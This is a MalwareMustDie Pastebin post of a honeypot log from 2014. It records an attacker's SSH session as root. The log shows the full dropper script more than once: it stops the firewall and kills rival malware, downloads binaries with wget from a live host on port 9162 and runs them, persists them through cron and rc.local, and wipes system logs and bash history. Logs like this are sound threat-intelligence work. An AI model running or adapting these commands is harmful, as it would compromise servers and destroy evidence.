MalwareMustDie

.IptabLes|x comeback frade8c.com:9162

Oct 13th, 2014
590
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
  2. #Follow report: still in the wild
  3. warning: live URLs
  4.  
  5. #Reported log;
  6.  
  7. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
  8. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
  9. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
  10. 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
  11. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
  12. 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
  13. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
  14.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  15.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  16.     apt-get -y install wget
  17.     yum -y install wget
  18.     chmod 7777 / etc
  19.     killall -9 .IptabLes
  20.     killall -9 nfsd4
  21.     killall -9 profild.key
  22.     cd /etc;rm -rf dir fake.cfg
  23.     killall -9 nfsd
  24.     killall -9 DDosl
  25.     killall -9 lengchao32
  26.     killall -9 b26
  27.     killall -9 khelper
  28.     killall -9 Bill
  29.     killall -9 n26
  30.     killall -9 007
  31.     killall -9 codelove
  32.     killall -9 32
  33.     killall -9 m32
  34.     killall -9 m64
  35.     killall -9 64
  36.     killall -9 83BOT
  37.     killall -9 82BOT
  38.     killall -9 dos64
  39.     killall -9 dos32
  40.     killall -9 new6
  41.     killall -9 new4
  42.     killall -9 node24
  43.     killall -9 mimi
  44.     killall -9 nodeJR-1
  45.     killall -9 freeBSD
  46.     killall -9 ksapdd
  47.     killall -9 106
  48.     killall -9 09
  49.     killall -9 xsw
  50.     killall -9 syslogd
  51.     killall -9 skysapdd
  52.     killall -9 cupsddd
  53.     killall -9 ksapd
  54.     killall -9 atddd
  55.     killall -9 xfsdxd
  56.     killall -9 sfewfesfs
  57.     killall -9 gfhjrtfyhuf
  58.     killall -9 rewgtf3er4t
  59.     killall -9 fdsfsfvff
  60.     killall -9 smarvtd
  61.     killall -9 whitptabil
  62.     killall -9 gdmorpen
  63.     cd /etc;chattr -i 66
  64.     cd /root; chmod 7777 / etc
  65.     killall -9 minerd
  66.     killall -9 syn
  67.     killall -9 joudckfr
  68.     killall -9 www
  69.     killall -9 log
  70.     killall -9 .IptabLes
  71.     killall -9 .IptabLex
  72.     killall -9 .Mm2
  73.     killall -9 acpid
  74.     killall -9 m64
  75.     killall -9 ./QQ
  76.     killall -9 aabb
  77.     killall -9 g3
  78.     killall -9 S99local
  79.     killall -9 3
  80.     killall -9 pm
  81.     killall -9 qweasd
  82.     killall -9 tangtang
  83.     killall -9 imap-login
  84.     killall -9 xudp
  85.     killall -9 sshpa
  86.     killall -9 008
  87.     killall -9 txma
  88.     killall -9 mrdos64.b00
  89.     killall -9 mrdos32.b00
  90.     killall -9 kkpklp
  91.     killall -9 kiilp
  92.     killall -9 xin1
  93.     killall -9 jibateng
  94.     killall -9 syscore.sh
  95.     killall -9 syscore.sh
  96.     killall -9 syscore.sh
  97.     killall -9 .mimeo
  98.     killall -9 .mimeo
  99.     killall -9 .mimeo
  100.     killall -9 .mimeop
  101.     killall -9 .task1
  102.     killall -9 .mimeop
  103.     killall -9 .IptabLes
  104.     killall -9 .IptabLex
  105.     killall -9 .IptabLes
  106.     killall -9 .IptabLex
  107.     killall -9 .IptabLes
  108.     killall -9 .IptabLex
  109.     killall -9 .IptabLes
  110.     killall -9 .IptabLex
  111.     cd /root;rm -rf dir nohup.out
  112.     cd /etc;rm -rf dir fake.cfg
  113.     cd /etc;rm -rf dir cupsddd.*
  114.     cd /etc;rm -rf dir atddd.*
  115.     cd /etc;rm -rf dir ksapdd.*
  116.     cd /etc;rm -rf dir kysapdd.*
  117.     cd /etc;rm -rf dir sksapdd.*
  118.     cd /etc;rm -rf dir skysapdd.*
  119.     cd /etc;rm -rf dir xfsdxd.*
  120.     cd /etc;rm -rf dir fake.cfg
  121.     cd /etc;rm -rf dir cupsdd.*
  122.     cd /etc;rm -rf dir atdd.*
  123.     cd /etc;rm -rf dir ksapd.*
  124.     cd /etc;rm -rf dir kysapd.*
  125.     cd /etc;rm -rf dir sksapd.*
  126.     cd /etc;rm -rf dir skysapd.*
  127.     cd /etc;rm -rf dir xfsdx.*
  128.     cd /etc;rm -rf dir sfewfesfs
  129.     cd /etc;rm -rf dir gfhjrtfyhuf
  130.     cd /etc;rm -rf dir rewgtf3er4t
  131.     cd /etc;rm -rf dir fdsfsfvff
  132.     cd /etc;rm -rf dir smarvtd
  133.     cd /etc;rm -rf dir whitptabil
  134.     cd /etc;rm -rf dir gdmorpen
  135.     cd /etc;rm -rf dir sfewfesfs.*
  136.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  137.     cd /etc;rm -rf dir rewgtf3er4t.*
  138.     cd /etc;rm -rf dir fdsfsfvff.*
  139.     cd /etc;rm -rf dir smarvtd.*
  140.     cd /etc;rm -rf dir whitptabil.*
  141.     cd /etc;rm -rf dir gdmorpen.*
  142.     cd /etc;rm -rf dir nhgbhhj.*
  143.     cd /tmp;rm -rf dir 1.*
  144.     cd /tmp;rm -rf dir 2.*
  145.     cd /tmp;rm -rf dir 3.*
  146.     cd /tmp;rm -rf dir 4.*
  147.     cd /tmp;rm -rf dir 5.*
  148.     cd /tmp;rm -rf dir jdhe
  149.     cd /tmp;rm -rf dir jdhe.*
  150.     cd /var/spool/cron; rm -rf dir root.*
  151.     cd /var/spool/cron; rm -rf dir root
  152.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  153.     cd /var/spool/cron/crontabs; rm -rf dir root
  154.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  155.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  156.     yes|mv /tmp/root /var/spool/cron
  157.     yes|mv /tmp/root /var/spool/cron/crontabs
  158.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  159.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  160.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  161.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  162.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  163.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  164.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  165.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  166.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  167.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  168.     cd /tmp;chmod 7777 jdhe
  169.     cd /etc;chmod 7777 nhgbhhj
  170.     cd /etc;chmod 7777 byv832
  171.     cd /etc;chmod 7777 sfewfesfs
  172.     cd /etc;chmod 7777 gfhjrtfyhuf
  173.     cd /etc;chmod 7777 rewgtf3er4t
  174.     cd /etc;chmod 7777 fdsfsfvff
  175.     cd /etc;chmod 7777 smarvtd
  176.     cd /etc;chmod 7777 whitptabil
  177.     cd /etc;chmod 7777 gdmorpen
  178.     cd /tmp;chmod 7777 nhgbhhj
  179.     cd /tmp;chmod 7777 byv832
  180.     cd /tmp;chmod 7777 sfewfesfs
  181.     cd /tmp;chmod 7777 gfhjrtfyhuf
  182.     cd /tmp;chmod 7777 rewgtf3er4t
  183.     cd /tmp;chmod 7777 fdsfsfvff
  184.     cd /tmp;chmod 7777 smarvtd
  185.     cd /tmp;chmod 7777 whitptabil
  186.     cd /tmp;chmod 7777 gdmorpen
  187.     cd /tmp;./jdhe
  188.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  189.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  190.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  191.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  192.     nohup /etc/smarvtd > /dev/null 2>&1&
  193.     nohup /etc/whitptabil > /dev/null 2>&1&
  194.     nohup /etc/gdmorpen > /dev/null 2>&1&
  195.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  196.     nohup /etc/byv832 > /dev/null 2>&1&
  197.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  198.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  199.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  200.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  201.     nohup /tmp/smarvtd > /dev/null 2>&1&
  202.     nohup /tmp/whitptabil > /dev/null 2>&1&
  203.     nohup /tmp/gdmorpen > /dev/null 2>&1&
  204.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  205.     nohup /tmp/byv832 > /dev/null 2>&1&
  206.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  207.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  208.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  209.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  210.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  211.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  212.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  213.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  214.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  215.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  216.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  217.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  218.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  219.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  220.     echo "unset MAILCHECK" >> /etc/profile
  221.     cd /etc;chattr +i sfewfesfs
  222.     rm -rf /root/.bash_history
  223.     touch /root/.bash_history
  224.     history -r
  225.     cd /var/log > dmesg
  226.     cd /var/log > auth.log
  227.     cd /var/log > alternatives.log
  228.     cd /var/log > boot.log
  229.     cd /var/log > btmp
  230.     cd /var/log > cron
  231.     cd /var/log > cups
  232.     cd /var/log > daemon.log
  233.     cd /var/log > dpkg.log
  234.     cd /var/log > faillog
  235.     cd /var/log > kern.log
  236.     cd /var/log > lastlog
  237.     cd /var/log > maillog
  238.     cd /var/log > user.log
  239.     cd /var/log > Xorg.x.log
  240.     cd /var/log > anaconda.log
  241.     cd /var/log > yum.log
  242.     cd /var/log > secure
  243.     cd /var/log > wtmp
  244.     cd /var/log > utmp
  245.     cd /var/log > messages
  246.     cd /var/log > spooler
  247.     cd /var/log > sudolog
  248.     cd /var/log > aculog
  249.     cd /var/log > access-log
  250.     cd /root > .bash_history
  251.     history -c"
  252. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
  253.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  254.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  255.     apt-get -y install wget
  256.     yum -y install wget
  257.     chmod 7777 / etc
  258.     killall -9 .IptabLes
  259.     killall -9 nfsd4
  260.     killall -9 profild.key
  261.     cd /etc;rm -rf dir fake.cfg
  262.     killall -9 nfsd
  263.     killall -9 DDosl
  264.     killall -9 lengchao32
  265.     killall -9 b26
  266.     killall -9 khelper
  267.     killall -9 Bill
  268.     killall -9 n26
  269.     killall -9 007
  270.     killall -9 codelove
  271.     killall -9 32
  272.     killall -9 m32
  273.     killall -9 m64
  274.     killall -9 64
  275.     killall -9 83BOT
  276.     killall -9 82BOT
  277.     killall -9 dos64
  278.     killall -9 dos32
  279.     killall -9 new6
  280.     killall -9 new4
  281.     killall -9 node24
  282.     killall -9 mimi
  283.     killall -9 nodeJR-1
  284.     killall -9 freeBSD
  285.     killall -9 ksapdd
  286.     killall -9 106
  287.     killall -9 09
  288.     killall -9 xsw
  289.     killall -9 syslogd
  290.     killall -9 skysapdd
  291.     killall -9 cupsddd
  292.     killall -9 ksapd
  293.     killall -9 atddd
  294.     killall -9 xfsdxd
  295.     killall -9 sfewfesfs
  296.     killall -9 gfhjrtfyhuf
  297.     killall -9 rewgtf3er4t
  298.     killall -9 fdsfsfvff
  299.     killall -9 smarvtd
  300.     killall -9 whitptabil
  301.     killall -9 gdmorpen
  302.     cd /etc;chattr -i 66
  303.     cd /root; chmod 7777 / etc
  304.     killall -9 minerd
  305.     killall -9 syn
  306.     killall -9 joudckfr
  307.     killall -9 www
  308.     killall -9 log
  309.     killall -9 .IptabLes
  310.     killall -9 .IptabLex
  311.     killall -9 .Mm2
  312.     killall -9 acpid
  313.     killall -9 m64
  314.     killall -9 ./QQ
  315.     killall -9 aabb
  316.     killall -9 g3
  317.     killall -9 S99local
  318.     killall -9 3
  319.     killall -9 pm
  320.     killall -9 qweasd
  321.     killall -9 tangtang
  322.     killall -9 imap-login
  323.     killall -9 xudp
  324.     killall -9 sshpa
  325.     killall -9 008
  326.     killall -9 txma
  327.     killall -9 mrdos64.b00
  328.     killall -9 mrdos32.b00
  329.     killall -9 kkpklp
  330.     killall -9 kiilp
  331.     killall -9 xin1
  332.     killall -9 jibateng
  333.     killall -9 syscore.sh
  334.     killall -9 syscore.sh
  335.     killall -9 syscore.sh
  336.     killall -9 .mimeo
  337.     killall -9 .mimeo
  338.     killall -9 .mimeo
  339.     killall -9 .mimeop
  340.     killall -9 .task1
  341.     killall -9 .mimeop
  342.     killall -9 .IptabLes
  343.     killall -9 .IptabLex
  344.     killall -9 .IptabLes
  345.     killall -9 .IptabLex
  346.     killall -9 .IptabLes
  347.     killall -9 .IptabLex
  348.     killall -9 .IptabLes
  349.     killall -9 .IptabLex
  350.     cd /root;rm -rf dir nohup.out
  351.     cd /etc;rm -rf dir fake.cfg
  352.     cd /etc;rm -rf dir cupsddd.*
  353.     cd /etc;rm -rf dir atddd.*
  354.     cd /etc;rm -rf dir ksapdd.*
  355.     cd /etc;rm -rf dir kysapdd.*
  356.     cd /etc;rm -rf dir sksapdd.*
  357.     cd /etc;rm -rf dir skysapdd.*
  358.     cd /etc;rm -rf dir xfsdxd.*
  359.     cd /etc;rm -rf dir fake.cfg
  360.     cd /etc;rm -rf dir cupsdd.*
  361.     cd /etc;rm -rf dir atdd.*
  362.     cd /etc;rm -rf dir ksapd.*
  363.     cd /etc;rm -rf dir kysapd.*
  364.     cd /etc;rm -rf dir sksapd.*
  365.     cd /etc;rm -rf dir skysapd.*
  366.     cd /etc;rm -rf dir xfsdx.*
  367.     cd /etc;rm -rf dir sfewfesfs
  368.     cd /etc;rm -rf dir gfhjrtfyhuf
  369.     cd /etc;rm -rf dir rewgtf3er4t
  370.     cd /etc;rm -rf dir fdsfsfvff
  371.     cd /etc;rm -rf dir smarvtd
  372.     cd /etc;rm -rf dir whitptabil
  373.     cd /etc;rm -rf dir gdmorpen
  374.     cd /etc;rm -rf dir sfewfesfs.*
  375.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  376.     cd /etc;rm -rf dir rewgtf3er4t.*
  377.     cd /etc;rm -rf dir fdsfsfvff.*
  378.     cd /etc;rm -rf dir smarvtd.*
  379.     cd /etc;rm -rf dir whitptabil.*
  380.     cd /etc;rm -rf dir gdmorpen.*
  381.     cd /etc;rm -rf dir nhgbhhj.*
  382.     cd /tmp;rm -rf dir 1.*
  383.     cd /tmp;rm -rf dir 2.*
  384.     cd /tmp;rm -rf dir 3.*
  385.     cd /tmp;rm -rf dir 4.*
  386.     cd /tmp;rm -rf dir 5.*
  387.     cd /tmp;rm -rf dir jdhe
  388.     cd /tmp;rm -rf dir jdhe.*
  389.     cd /var/spool/cron; rm -rf dir root.*
  390.     cd /var/spool/cron; rm -rf dir root
  391.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  392.     cd /var/spool/cron/crontabs; rm -rf dir root
  393.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  394.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  395.     yes|mv /tmp/root /var/spool/cron
  396.     yes|mv /tmp/root /var/spool/cron/crontabs
  397.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  398.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  399.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  400.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  401.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  402.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  403.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  404.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  405.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  406.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  407.     cd /tmp;chmod 7777 jdhe
  408.     cd /etc;chmod 7777 nhgbhhj
  409.     cd /etc;chmod 7777 byv832
  410.     cd /etc;chmod 7777 sfewfesfs
  411.     cd /etc;chmod 7777 gfhjrtfyhuf
  412.     cd /etc;chmod 7777 rewgtf3er4t
  413.     cd /etc;chmod 7777 fdsfsfvff
  414.     cd /etc;chmod 7777 smarvtd
  415.     cd /etc;chmod 7777 whitptabil
  416.     cd /etc;chmod 7777 gdmorpen
  417.     cd /tmp;chmod 7777 nhgbhhj
  418.     cd /tmp;chmod 7777 byv832
  419.     cd /tmp;chmod 7777 sfewfesfs
  420.     cd /tmp;chmod 7777 gfhjrtfyhuf
  421.     cd /tmp;chmod 7777 rewgtf3er4t
  422.     cd /tmp;chmod 7777 fdsfsfvff
  423.     cd /tmp;chmod 7777 smarvtd
  424.     cd /tmp;chmod 7777 whitptabil
  425.     cd /tmp;chmod 7777 gdmorpen
  426.     cd /tmp;./jdhe
  427.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  428.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  429.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  430.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  431.     nohup /etc/smarvtd > /dev/null 2>&1&
  432.     nohup /etc/whitptabil > /dev/null 2>&1&
  433.     nohup /etc/gdmorpen > /dev/null 2>&1&
  434.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  435.     nohup /etc/byv832 > /dev/null 2>&1&
  436.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  437.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  438.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  439.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  440.     nohup /tmp/smarvtd > /dev/null 2>&1&
  441.     nohup /tmp/whitptabil > /dev/null 2>&1&
  442.     nohup /tmp/gdmorpen > /dev/null 2>&1&
  443.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  444.     nohup /tmp/byv832 > /dev/null 2>&1&
  445.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  446.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  447.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  448.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  449.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  450.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  451.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  452.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  453.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  454.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  455.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  456.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  457.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  458.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  459.     echo "unset MAILCHECK" >> /etc/profile
  460.     cd /etc;chattr +i sfewfesfs
  461.     rm -rf /root/.bash_history
  462.     touch /root/.bash_history
  463.     history -r
  464.     cd /var/log > dmesg
  465.     cd /var/log > auth.log
  466.     cd /var/log > alternatives.log
  467.     cd /var/log > boot.log
  468.     cd /var/log > btmp
  469.     cd /var/log > cron
  470.     cd /var/log > cups
  471.     cd /var/log > daemon.log
  472.     cd /var/log > dpkg.log
  473.     cd /var/log > faillog
  474.     cd /var/log > kern.log
  475.     cd /var/log > lastlog
  476.     cd /var/log > maillog
  477.     cd /var/log > user.log
  478.     cd /var/log > Xorg.x.log
  479.     cd /var/log > anaconda.log
  480.     cd /var/log > yum.log
  481.     cd /var/log > secure
  482.     cd /var/log > wtmp
  483.     cd /var/log > utmp
  484.     cd /var/log > messages
  485.     cd /var/log > spooler
  486.     cd /var/log > sudolog
  487.     cd /var/log > aculog
  488.     cd /var/log > access-log
  489.     cd /root > .bash_history
  490.     history -c"
  491. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
  492. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
  493.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  494.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  495.     apt-get -y install wget
  496.     yum -y install wget
  497.     chmod 7777 / etc
  498.     killall -9 .IptabLes
  499.     killall -9 nfsd4
  500.     killall -9 profild.key
  501.     cd /etc;rm -rf dir fake.cfg
  502.     killall -9 nfsd
  503.     killall -9 DDosl
  504.     killall -9 lengchao32
  505.     killall -9 b26
  506.     killall -9 khelper
  507.     killall -9 Bill
  508.     killall -9 n26
  509.     killall -9 007
  510.     killall -9 codelove
  511.     killall -9 32
  512.     killall -9 m32
  513.     killall -9 m64
  514.     killall -9 64
  515.     killall -9 83BOT
  516.     killall -9 82BOT
  517.     killall -9 dos64
  518.     killall -9 dos32
  519.     killall -9 new6
  520.     killall -9 new4
  521.     killall -9 node24
  522.     killall -9 mimi
  523.     killall -9 nodeJR-1
  524.     killall -9 freeBSD
  525.     killall -9 ksapdd
  526.     killall -9 106
  527.     killall -9 09
  528.     killall -9 xsw
  529.     killall -9 syslogd
  530.     killall -9 skysapdd
  531.     killall -9 cupsddd
  532.     killall -9 ksapd
  533.     killall -9 atddd
  534.     killall -9 xfsdxd
  535.     killall -9 sfewfesfs
  536.     killall -9 gfhjrtfyhuf
  537.     killall -9 rewgtf3er4t
  538.     killall -9 fdsfsfvff
  539.     killall -9 smarvtd
  540.     killall -9 whitptabil
  541.     killall -9 gdmorpen
  542.     cd /etc;chattr -i 66
  543.     cd /root; chmod 7777 / etc
  544.     killall -9 minerd
  545.     killall -9 syn
  546.     killall -9 joudckfr
  547.     killall -9 www
  548.     killall -9 log
  549.     killall -9 .IptabLes
  550.     killall -9 .IptabLex
  551.     killall -9 .Mm2
  552.     killall -9 acpid
  553.     killall -9 m64
  554.     killall -9 ./QQ
  555.     killall -9 aabb
  556.     killall -9 g3
  557.     killall -9 S99local
  558.     killall -9 3
  559.     killall -9 pm
  560.     killall -9 qweasd
  561.     killall -9 tangtang
  562.     killall -9 imap-login
  563.     killall -9 xudp
  564.     killall -9 sshpa
  565.     killall -9 008
  566.     killall -9 txma
  567.     killall -9 mrdos64.b00
  568.     killall -9 mrdos32.b00
  569.     killall -9 kkpklp
  570.     killall -9 kiilp
  571.     killall -9 xin1
  572.     killall -9 jibateng
  573.     killall -9 syscore.sh
  574.     killall -9 syscore.sh
  575.     killall -9 syscore.sh
  576.     killall -9 .mimeo
  577.     killall -9 .mimeo
  578.     killall -9 .mimeo
  579.     killall -9 .mimeop
  580.     killall -9 .task1
  581.     killall -9 .mimeop
  582.     killall -9 .IptabLes
  583.     killall -9 .IptabLex
  584.     killall -9 .IptabLes
  585.     killall -9 .IptabLex
  586.     killall -9 .IptabLes
  587.     killall -9 .IptabLex
  588.     killall -9 .IptabLes
  589.     killall -9 .IptabLex
  590.     cd /root;rm -rf dir nohup.out
  591.     cd /etc;rm -rf dir fake.cfg
  592.     cd /etc;rm -rf dir cupsddd.*
  593.     cd /etc;rm -rf dir atddd.*
  594.     cd /etc;rm -rf dir ksapdd.*
  595.     cd /etc;rm -rf dir kysapdd.*
  596.     cd /etc;rm -rf dir sksapdd.*
  597.     cd /etc;rm -rf dir skysapdd.*
  598.     cd /etc;rm -rf dir xfsdxd.*
  599.     cd /etc;rm -rf dir fake.cfg
  600.     cd /etc;rm -rf dir cupsdd.*
  601.     cd /etc;rm -rf dir atdd.*
  602.     cd /etc;rm -rf dir ksapd.*
  603.     cd /etc;rm -rf dir kysapd.*
  604.     cd /etc;rm -rf dir sksapd.*
  605.     cd /etc;rm -rf dir skysapd.*
  606.     cd /etc;rm -rf dir xfsdx.*
  607.     cd /etc;rm -rf dir sfewfesfs
  608.     cd /etc;rm -rf dir gfhjrtfyhuf
  609.     cd /etc;rm -rf dir rewgtf3er4t
  610.     cd /etc;rm -rf dir fdsfsfvff
  611.     cd /etc;rm -rf dir smarvtd
  612.     cd /etc;rm -rf dir whitptabil
  613.     cd /etc;rm -rf dir gdmorpen
  614.     cd /etc;rm -rf dir sfewfesfs.*
  615.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  616.     cd /etc;rm -rf dir rewgtf3er4t.*
  617.     cd /etc;rm -rf dir fdsfsfvff.*
  618.     cd /etc;rm -rf dir smarvtd.*
  619.     cd /etc;rm -rf dir whitptabil.*
  620.     cd /etc;rm -rf dir gdmorpen.*
  621.     cd /etc;rm -rf dir nhgbhhj.*
  622.     cd /tmp;rm -rf dir 1.*
  623.     cd /tmp;rm -rf dir 2.*
  624.     cd /tmp;rm -rf dir 3.*
  625.     cd /tmp;rm -rf dir 4.*
  626.     cd /tmp;rm -rf dir 5.*
  627.     cd /tmp;rm -rf dir jdhe
  628.     cd /tmp;rm -rf dir jdhe.*
  629.     cd /var/spool/cron; rm -rf dir root.*
  630.     cd /var/spool/cron; rm -rf dir root
  631.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  632.     cd /var/spool/cron/crontabs; rm -rf dir root
  633.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  634.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  635.     yes|mv /tmp/root /var/spool/cron
  636.     yes|mv /tmp/root /var/spool/cron/crontabs
  637.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  638.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  639.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  640.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  641.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  642.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  643.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  644.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  645.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  646.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  647.     cd /tmp;chmod 7777 jdhe
  648.     cd /etc;chmod 7777 nhgbhhj
  649.     cd /etc;chmod 7777 byv832
  650.     cd /etc;chmod 7777 sfewfesfs
  651.     cd /etc;chmod 7777 gfhjrtfyhuf
  652.     cd /etc;chmod 7777 rewgtf3er4t
  653.     cd /etc;chmod 7777 fdsfsfvff
  654.     cd /etc;chmod 7777 smarvtd
  655.     cd /etc;chmod 7777 whitptabil
  656.     cd /etc;chmod 7777 gdmorpen
  657.     cd /tmp;chmod 7777 nhgbhhj
  658.     cd /tmp;chmod 7777 byv832
  659.     cd /tmp;chmod 7777 sfewfesfs
  660.     cd /tmp;chmod 7777 gfhjrtfyhuf
  661.     cd /tmp;chmod 7777 rewgtf3er4t
  662.     cd /tmp;chmod 7777 fdsfsfvff
  663.     cd /tmp;chmod 7777 smarvtd
  664.     cd /tmp;chmod 7777 whitptabil
  665.     cd /tmp;chmod 7777 gdmorpen
  666.     cd /tmp;./jdhe
  667.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  668.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  669.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  670.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  671.     nohup /etc/smarvtd > /dev/null 2>&1&
  672.     nohup /etc/whitptabil > /dev/null 2>&1&
  673.     nohup /etc/gdmorpen > /dev/null 2>&1&
  674.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  675.     nohup /etc/byv832 > /dev/null 2>&1&
  676.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  677.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  678.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  679.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  680.     nohup /tmp/smarvtd > /dev/null 2>&1&
  681.     nohup /tmp/whitptabil > /dev/null 2>&1&
  682.     nohup /tmp/gdmorpen > /dev/null 2>&1&
